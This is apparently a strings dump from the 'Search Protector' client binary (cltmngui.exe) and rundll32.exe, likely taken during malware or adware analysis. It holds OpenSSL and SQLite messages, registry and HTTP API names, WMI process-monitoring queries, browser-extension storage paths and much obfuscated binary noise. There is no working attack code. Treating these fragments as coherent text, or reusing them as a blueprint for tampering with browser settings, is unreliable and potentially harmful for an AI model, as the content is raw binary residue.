setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
RAND part of OpenSSL 1.0.1e 11 Feb 2013
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
lhash part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
EVP part of OpenSSL 1.0.1e 11 Feb 2013
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
AUTHORITY_KEYID
keyid
cert_info
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
EC part of OpenSSL 1.0.1e 11 Feb 2013
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013
SHA part of OpenSSL 1.0.1e 11 Feb 2013
MD5 part of OpenSSL 1.0.1e 11 Feb 2013
MD4 part of OpenSSL 1.0.1e 11 Feb 2013
AES part of OpenSSL 1.0.1e 11 Feb 2013
CAST part of OpenSSL 1.0.1e 11 Feb 2013
Blowfish part of OpenSSL 1.0.1e 11 Feb 2013
:RC2 part of OpenSSL 1.0.1e 11 Feb 2013
.pp@0
aEÐ
 (#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.1e 11 Feb 2013
libdes part of OpenSSL 1.0.1e 11 Feb 2013
DES part of OpenSSL 1.0.1e 11 Feb 2013
\X
ddddddZ
ddddddZ
%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
%d.%d.%d.%d/%d.%d.%d.%d
X509_CERT_PAIR
X509_CERT_AUX
X.509 part of OpenSSL 1.0.1e 11 Feb 2013
x%s
%s - d:d:d%.*s %d%s
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
ECDSA part of OpenSSL 1.0.1e 11 Feb 2013
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
'() ,-./:=?
%lu:%s:%s:%d:%s
Verifying - %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF part of OpenSSL 1.0.1e 11 Feb 2013
PROXY_CERT_INFO_EXTENSION
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
keylength
keyfunc
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
.\crypto\pkcs12\p12_key.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF_def part of OpenSSL 1.0.1e 11 Feb 2013
[[%s]]
[%s] %s=%s
ECDH part of OpenSSL 1.0.1e 11 Feb 2013
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
%A%@%S%Q%W%J%S%L%B%J%
%F%J%H%
*F'F$FhF5F#F'F4F%F.FhF%F)F(F"F3F/F2FhF%F)F F
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
A%@%C%D%P%I%Q%v%@%D%W%F%M%
(\=\7\9\3\*\9\.\
{{{$1274}}}
{{{$626}}}
{{{$1275}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp
J%V%I%J%F%D%I%@%
@7@!@)@4@
@4@!@ @%@/@6@%@2@
@%@6@%@.@4@
S6S%S6S!S'S6S7S
8U4U-UuU4U!U!U0U8U%U!U&UuU'U0U4U6U=U0U1U
{{{$461}}}
{{{$468}}}
{{{$471}}}
{{{$473}}}
\StringFileInfo\xx\%s
(more frames truncated from call stack report)
%d/%d/%d d:d:d
Module %d
Image Base: 0xx Image Size: 0xx
Checksum: 0xx Time Stamp: 0xx
File Size: %-10d File Time: %s
Company: %s
Product: %s
FileDesc: %s
FileVer: %d.%d.%d.%d
ProdVer: %d.%d.%d.%d
Windows Vista
Windows 7
Windows Server 2008
Windows 8
Windows Server 2008 R2
Windows 9
Web Edition
Windows Server 2012
Windows XP
Windows Server 9
Windows 2000
(build %d)
This sample does not support this version of Windows.
Error occurred at %s.
Operating system: %s
Operating system: Could not Determine
%d processor(s), type %d.
%d%% memory in use.
%d MBytes paging file.
%d MBytes physical memory free.
%d MBytes user address space free.
%d MBytes paging file free.
%d MBytes user address space.
Web Server Edition
Windows Server 2003 R2
Windows Storage Server 2003
Windows Home Server
a Float Denormal Operand
Windows XP Professional x64 Edition
Windows Server 2003
a Float Invalid Operation
0xx:
%s\CRASH_REPORT_%s.txt
%d MBytes physical memory.
EDI: 0xx ESI: 0xx EAX: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EFlags: 0xx ESP: 0xx SegSs: 0xx
%s caused %s (0xx)
in module %s at x:x.
%s location x caused an access violation.
===== [end of %s] =====
%s\CRASH_DUMP_%s.dmp
Error creating dump file, err=%d
Exception code is 0xX
Crash dump file: %s
Crash report file :%s
P%d_T%d_Dld_ld_ld_Tld_ld_ld
code: %x, addr: %x, module: %s
code: %x
{{{$629}}}
{{{$631}}}
{{{$630}}}
{{{$632}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h
%s 0x%I64x %s [file:%s(%u)]
{{{$101}}}
{{{$102}}}
{{{$108}}}
{{{$109}}}
{{{$106}}}
{{{$107}}}
{{{$104}}}
{{{$105}}}
{{{$103}}}
{{{$112}}}
{{{$113}}}
{{{$110}}}
{{{$111}}}
{{{$100}}}
{{{$118}}}
{{{$117}}}
{{{$116}}}
{{{$115}}}
{{{$114}}}
{{{$121}}}
{{{$120}}}
{{{$119}}}
{{{$123}}}
{{{$122}}}
{{{$525}}}
{{{$524}}}
{{{$526}}}
{{{$532}}}
{{{$531}}}
{{{$530}}}
{{{$529}}}
{{{$528}}}
{{{$527}}}
{{{$536}}}
{{{$534}}}
{{{$533}}}
{{{$538}}}
{{{$537}}}
{{{$483}}}
{{{$487}}}
{{{$486}}}
{{{$485}}}
{{{$484}}}
{{{$489}}}
{{{$488}}}
{{{$495}}}
{{{$494}}}
{{{$499}}}
{{{$498}}}
{{{$497}}}
{{{$496}}}
{{{$504}}}
{{{$503}}}
{{{$502}}}
{{{$501}}}
{{{$500}}}
{{{$560}}}
{{{$564}}}
{{{$563}}}
{{{$562}}}
{{{$561}}}
{{{$568}}}
{{{$567}}}
{{{$566}}}
{{{$565}}}
{{{$572}}}
{{{$571}}}
{{{$570}}}
{{{$569}}}
{{{$577}}}
{{{$576}}}
{{{$575}}}
{{{$574}}}
{{{$573}}}
{{{$580}}}
{{{$579}}}
{{{$578}}}
{{{$582}}}
{{{$581}}}
{{{$586}}}
{{{$584}}}
{{{$583}}}
{{{$590}}}
{{{$589}}}
{{{$587}}}
{{{$592}}}
{{{$591}}}
{{{$595}}}
{{{$594}}}
{{{$593}}}
{{{$598}}}
{{{$597}}}
{{{$596}}}
{{{$600}}}
{{{$599}}}
{{{$603}}}
{{{$602}}}
{{{$601}}}
{{{$606}}}
{{{$605}}}
{{{$604}}}
{{{$238}}}
{{{$237}}}
\/\/\9\(\
c%W%J%H%l%K%V%Q%D%I%I%
D%D/D!D D2D!D6D
DÐD%D
1d'd)d;d7d!dÖd'd,d;d0d!d6d)d
{{{$507}}}
{{{$506}}}
{{{$505}}}
{{{$509}}}
{{{$508}}}
{{{$510}}}
{{{$513}}}
{{{$512}}}
{{{$511}}}
{{{$515}}}
{{{$514}}}
{{{$519}}}
{{{$518}}}
{{{$517}}}
{{{$516}}}
{{{$521}}}
{{{$520}}}
{{{$522}}}
{{{$523}}}
4|7|?|?|
{{{$614}}}
{{{$613}}}
{{{$612}}}
{{{$611}}}
{{{$610}}}
{{{$609}}}
_3_0_=_>_3_
_(_6_1_;_0_(_,_
_8_3_0_=_>_3_
_<_0_*_1_ _:_-_,_
S6S!S>S S.SuS
cCc%c
{{{$404}}}
{{{$403}}}
{{{$402}}}
{{{$405}}}
Z.Z#Z*Z?ZgZ}Z.Z?Z"Z.ZuZ2Z.Z7Z6Z}Z
{{{$406}}}
[([>[:[)[8[3[
[>[)[6[&[
{{{$408}}}
{{{$410}}}
{{{$409}}}
F5F#F'F4F%F.F6F*F3F!F/F(F5F
B0B.BbB6B;B2B'B
CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);
insert into ItemTable (key, value) VALUES ('%s', '%s');
PUADQ@%%h`qdv%V@Q%vu`flclfv8:4)%v`ws`wZvu`flclfv8:7%RM@W@%kjkZpkltp`Zkdh`%iln`%"mjh`udb`ZlvZk`rqdgudb`"%DKA%v`ws`wZkjkZpkltp`Zkdh`%%iln`%"mjh`udb`ZlvZk`rqdgudb`"
{{{$313}}}
{{{$312}}}
{{{$314}}}
{{{$334}}}
a!-dc}xyRhcnbidcj~!-~xjjh~yRx
U&U!U4U'U!U U%U
{{{$359}}}
{{{$358}}}
{{{$357}}}
{{{$360}}}
00:00:00.
NtQueryKey
{{{$618}}}
{{{$617}}}
{{{$616}}}
{{{$615}}}
{{{$624}}}
{{{$623}}}
{{{$692}}}
{{{$691}}}
{{{$690}}}
{{{$693}}}
1.1.3
gen_codes: max_code %d
code %d bits %d->%d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
wininet.dll
ftp://
https://
http://
[%u, 0xx] %s
https
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
request HttpSendRequestA failed...
Content-Length: %u
response failed...last error %d
{{{$718}}}
{{{$717}}}
{{{$719}}}
{{{$720}}}
{{{$722}}}
{{{$721}}}
{{{$724}}}
{{{$723}}}
{{{$725}}}
{{{$729}}}
{{{$728}}}
{{{$727}}}
{{{$726}}}
{{{$730}}}
{{{$733}}}
{{{$732}}}
{{{$731}}}
{{{$735}}}
{{{$734}}}
{{{$744}}}
{{{$743}}}
{{{$742}}}
{{{$747}}}
{{{$746}}}
{{{$667}}}
{{{$669}}}
{{{$668}}}
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
0123456789ABCDEF3.7.16
CREATE TEMP TABLE sqlite_temp_master(
{{{$138}}}
{{{$141}}}
{{{$140}}}
{{{$139}}}
{{{$146}}}
{{{$145}}}
{{{$144}}}
{{{$143}}}
{{{$142}}}
{{{$129}}}
{{{$128}}}
{{{$127}}}
{{{$126}}}
{{{$125}}}
{{{$124}}}
{{{$134}}}
{{{$133}}}
{{{$132}}}
{{{$131}}}
{{{$130}}}
{{{$135}}}
{{{$1283}}}
(]3]4]3].])]<]1]1]
])]8]%])]
S6S!S%S6S!S
{{{$1285}}}
{{{$1284}}}
{{{$1292}}}
{{{$1291}}}
`%K%D%G%I%@%A%
F%F)F(F
D!D"DÑD(D0D
D!DÖD'D,D
U,U%U0U
x%xXx
x%xZxTxXxZx
uUu%u
uKu.u4u!u!u4u6u>u0u'u*u1u0u!u4uuWuOuUuWu%u
D*D7D0D%D(D(D
DÐD!D
D!D0D0D-D*D#DdD7D!D6D2D-D'D!DdD"D%D-D(D!D DjDdD
{{{$705}}}
{{{$704}}}
{{{$703}}}
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
SQLITE_
d-d-d
d:d:d
d-d-d d:d:d
failed memory resize %u to %u bytes
failed to allocate %u bytes of memory
API call with %s database connection pointer
922337203685477580
RowKey
OsError 0x%x (%u)
GetProcessHeap
delayed %dms for lock/sharing conflict
os_win.c:%d: (%d) %s(%s) - %s
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
2nd reference to page %d
invalid page number %d
Page %d:
freelist leaf count too big on page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
On tree page %d cell %d:
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Page %d is never used
Fragmentation of %d bytes reported as %d on page %d
unknown database %s
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
keyinfo(%d
%s(%d)
MJ delete: %s
%s-mjXXXXXX9XXz
foreign key constraint failed
-mjX9X
MJ collide: %s
bind on a busy prepared statement: [%s]
unable to use function %s in the requested context
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
cannot open savepoint - SQL statements in progress
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
sqlite_master
sqlite_temp_master
database table is locked: %s
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
cannot open view: %s
cannot open virtual table: %s
cannot open value of type %s
cannot open %s column for writing
indexed
foreign key
no such column: "%s"
misuse of aliased aggregate %s
%s: %s
%s: %s.%s
%s: %s.%s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
EXECUTE %s%s SUBQUERY %d
sqlite_rename_trigger
sqlite_rename_table
%s%.*s"%w"
%.*s"%w"%s
type='trigger' AND (%s)
%s OR name=%Q
sqlite_rename_parent
there is already another table or index with this name: %s
table %s may not be altered
sqlite_
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
Cannot add a PRIMARY KEY column
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
DELETE FROM %Q.%s WHERE %s=%Q
CREATE TABLE %Q.%s(%s)
too many attached databases - max %d
invalid name: "%s"
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
unable to open database: %s
database %s is already in use
database %s is locked
cannot detach database %s
no such database: %s
%s %T cannot reference objects in database %s
sqlite_attach
sqlite_detach
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
table "%s" has more than one primary key
default value of column [%s] is not constant
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
sqlite_stat%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
view %s is circularly defined
use DROP TABLE to delete table %s
table %s may not be dropped
sqlite_stat
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
use DROP VIEW to delete view %s
table %s may not be indexed
indexed columns are not unique
index %s already exists
there is already a table named %s
virtual tables may not be indexed
views may not be indexed
table %s has no column named %s
sqlite_autoindex_%s_%d
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
a JOIN clause is required before %s
unable to identify the object to be reindexed
cannot modify %s because it is a view
table %s may not be modified
no such collation sequence: %s
sqlite_version
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_log
sqlite_source_id
%d values for %d columns
table %S has %d columns but %d values were supplied
foreign key mismatch - "%w" referencing "%w"
constraint %s failed
%s.%s may not be NULL
table %S has no column named %s
PRIMARY KEY must be unique
unable to open shared library [%s]
sqlite3_extension_init
automatic extension loading failed: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
unsupported file format
%s - %s
malformed database schema (%s)
database schema is locked: %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
%s.%s
COMPOUND SUBQUERIES %d AND %d %s(%s)
USE TEMP B-TREE FOR %s
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
%s:%d
too many references to "%s": max 65535
sqlite_subquery_%p_
no such index: %s
SELECTs to the left and right of %s do not have the same number of result columns
no such table: %s
%s.%s.%s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
no such trigger: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
no such column: %s
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
PRAGMA vacuum_db.synchronous=OFF
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
vtable constructor did not declare schema: %s
vtable constructor failed: %s
table %s: xBestIndex returned an invalid plan
no such module: %s
%s TABLE %s
%s SUBQUERY %d
%s USING %s%sINDEX%s%s%s
%s AS %s
%s (rowid>?)
%s (rowid>? AND rowid%s (rowid=?)
%s USING INTEGER PRIMARY KEY
at most %d tables in a join
%s (~%lld rows)
%s VIRTUAL TABLE INDEX %d:%s
%s (rowidcannot use index: %s
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such vfs: %s
%s mode not allowed: %s
no such %s mode: %s
cannot open file at line %d of [%.10s]
misuse at line %d of [%.10s]
database corruption at line %d of [%.10s]
{{{$137}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\cltmngui.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
VERSION.dll
dbghelp.dll
GetCPInfo
GDI32.dll
SHELL32.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
RegisterHotKey
ReportEventA
I_RpcBindingInqTransportType
RPCRT4.dll
zcÁ
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI
;74/, (%#
~{xrpfa\ZSM@;3-%U
; ;$;(;,;0;4;8;<;
7 7$7(7,707
;_;#<\=|=
8 8$8(8,8{8
0$0(0,00040{0
< <$<(<,<0<4<8<
6 6$6(6,606
0,0004080<0
5$5-565d5k5t5}5
9‘9F9U9h9r9
8 8$8(8,8084888<8@8[8
00j0
00C0R0a0p0
3%4X4h4
5 6$6(6,606
7q7D7S7e7s7<8I8
5#565@5{5
"010?0'1
:,:0:4:8:
; <$<(<,<
: ;6;>;*<3>_>
8 <0<6<=<
99
> >$>(>,>0>4>8><>
:(;,;\;`;
3 3$3(3,30343
; ;$;(;,;0;4;8;
3 3$3(3,3@3
8 8<8@8`8
Zmscoree.dll
Zkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
{{{$625}}}
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
}{{{$663}}}
{{{$664}}}
{{{$665}}}
{{{$666}}}
{{{$663}}}
UserRepository.dat
SystemRepository.dat
UIRepository.dat
%x %x[%s] %I64x %x %x
Yuser32.dll
ieframe.dll
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
Windows Server 2012
Windows 8
Windows 8.1
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_USER_LOCAL_SETTINGS
{{{$697}}}
{{{$698}}}
{{{$535}}}
{{{$367}}}
{{{$366}}}
2.16.10.61
{{{$607}}}
{{{$381}}}
{{{$380}}}
_0.localstorage
chrome-extension_
{{{$254}}}
{{{$255}}}
{{{$251}}}
{{{$252}}}
36.0.0.0
32.0.0.0
{{{$290}}}
{{{$291}}}
{{{$293}}}
{{{$294}}}
{{{$296}}}
{{{$297}}}
Failed to set Url
{{{$305}}}
{{{$306}}}
{{{$307}}}
{{{$303}}}
{{{$304}}}
{{{$309}}}
{{{$310}}}
{{{$316}}}
{{{$317}}}
{{{$321}}}
{{{$322}}}
{{{$325}}}
{{{$333}}}
{{{$329}}}
{{{$330}}}
{{{$332}}}
{{{$345}}}
{{{$344}}}
{{{$350}}}
{{{$351}}}
{{{$354}}}
{{{$355}}}
{{{$378}}}
{{{$369}}}
{{{$368}}}
{{{$370}}}
{{{$549}}}
{{{$548}}}
{{{$707}}}
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
ntdll.dll
%s%s%s
Correct password required
{{{SP#Conduit::SearchProtector::Utils::WMIAgentJob::Join#SP}}}
{{{$715}}}
888816666554443
6666554443
!6666554443
{{{$1282}}}
01234567
UserSettings.dat
{{{SP#Conduit::SearchProtector::Application::Services::ServiceManager::HttpAsyncCallBack#SP}}}
{{{$77}}}
{{{SP#Conduit::SearchProtector::Application::Services::TimerBasedServiceHandler::HttpAsyncCallBack#SP}}}
{{{SP#Conduit::SearchProtector::Application::Services::ServiceHandler::HttpAsyncCallBack#SP}}}
RpcTransportException
C:\PROGRA~1\SearchProtect\UI\bin\cltmngui.exe

rundll32.exe_3116:


.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
